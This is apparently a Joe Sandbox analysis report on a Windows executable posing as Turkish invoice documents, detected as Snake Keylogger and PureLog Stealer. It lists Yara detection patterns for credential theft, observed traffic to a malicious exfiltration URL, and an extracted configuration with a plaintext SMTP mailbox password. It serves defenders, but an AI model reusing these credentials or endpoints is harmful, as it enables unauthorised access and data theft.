Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FATURA VE BELGELER..exe

Overview

General Information

Sample name:FATURA VE BELGELER..exe
Analysis ID:1435996
MD5:c62da7a3eac6bae78ea8a771faa65d17
SHA1:302984629aa44746a3e8b832c4fcacabcc585aaa
SHA256:0d5548b7d4696c67dba1d5bb827285ed2d3846fd0ad28140c198ad9c467f1bb0
Tags:exeSnakeKeylogger
Infos:

Detection

PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FATURA VE BELGELER..exe (PID: 6464 cmdline: "C:\Users\user\Desktop\FATURA VE BELGELER..exe" MD5: C62DA7A3EAC6BAE78EA8A771FAA65D17)
    • FATURA VE BELGELER..exe (PID: 6368 cmdline: "C:\Users\user\Desktop\FATURA VE BELGELER..exe" MD5: C62DA7A3EAC6BAE78EA8A771FAA65D17)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "info@promaksmakine.com", "Password": "16Promaks12!", "Host": "mail.promaksmakine.com", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x1488b:$a1: get_encryptedPassword
      • 0x14b81:$a2: get_encryptedUsername
      • 0x14697:$a3: get_timePasswordChanged
      • 0x14792:$a4: get_passwordField
      • 0x148a1:$a5: set_encryptedPassword
      • 0x15e90:$a7: get_logins
      • 0x15df3:$a10: KeyLoggerEventArgs
      • 0x15a8c:$a11: KeyLoggerEventArgsEventHandler
      00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x18170:$x1: $%SMTPDV$
      • 0x181d4:$x2: $#TheHashHere%&
      • 0x19831:$x3: %FTPDV$
      • 0x1991b:$x4: $%TelegramDv$
      • 0x15a8c:$x5: KeyLoggerEventArgs
      • 0x15df3:$x5: KeyLoggerEventArgs
      • 0x19855:$m2: Clipboard Logs ID
      • 0x19a17:$m2: Screenshot Logs ID
      • 0x19ae3:$m2: keystroke Logs ID
      • 0x199ef:$m4: \SnakeKeylogger\
      00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 16 entries
        SourceRuleDescriptionAuthorStrings
        0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.FATURA VE BELGELER..exe.2af6b84.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.FATURA VE BELGELER..exe.5400000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.FATURA VE BELGELER..exe.2b077fc.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.FATURA VE BELGELER..exe.2ad4668.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 36 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
                  Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
                  Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
                  Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@promaksmakine.com", "Password": "16Promaks12!", "Host": "mail.promaksmakine.com", "Port": "587"}
                  Source: scratchdreams.tkVirustotal: Detection: 17%Perma Link
                  Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 16%Perma Link
                  Source: https://scratchdreams.tkVirustotal: Detection: 18%Perma Link
                  Source: http://scratchdreams.tkVirustotal: Detection: 17%Perma Link
                  Source: FATURA VE BELGELER..exeReversingLabs: Detection: 42%
                  Source: FATURA VE BELGELER..exeVirustotal: Detection: 56%Perma Link
                  Source: FATURA VE BELGELER..exeJoe Sandbox ML: detected
                  Source: FATURA VE BELGELER..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49709 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49725 version: TLS 1.2
                  Source: FATURA VE BELGELER..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: HJbl.pdb source: FATURA VE BELGELER..exe
                  Source: Binary string: HJbl.pdbSHA256 source: FATURA VE BELGELER..exe
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06CCFD0Dh0_2_06CCF53B
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 0281F7A1h3_2_0281F4E8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_0281EA08
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 0281FBF9h3_2_0281F941
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06698D95h3_2_06698A58
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06695D11h3_2_06695A68
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 066988A9h3_2_06698600
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06696169h3_2_06695EC0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06696A19h3_2_06696770
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 066965C1h3_2_06696318
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_066937FA
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06696E71h3_2_06696BC8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 066902E9h3_2_06690040
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 066972C9h3_2_06697020
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06693808
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06697BA1h3_2_066978F8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06690B99h3_2_066908F0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 0669774Ah3_2_066974A0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06690741h3_2_06690498
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06690FF1h3_2_06690D48
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06697FF9h3_2_06697D50
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06695891h3_2_066955E8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06698451h3_2_066981A8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 4x nop then jmp 06691449h3_2_066911A0

                  Networking

                  barindex
                  Source: Yara matchFile source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
                  Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49709 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: scratchdreams.tk
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002AF3000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
                  Source: FATURA VE BELGELER..exeString found in binary or memory: http://tempuri.org/DataSetGen.xsd
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.227.219
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.227.219$
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49725 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
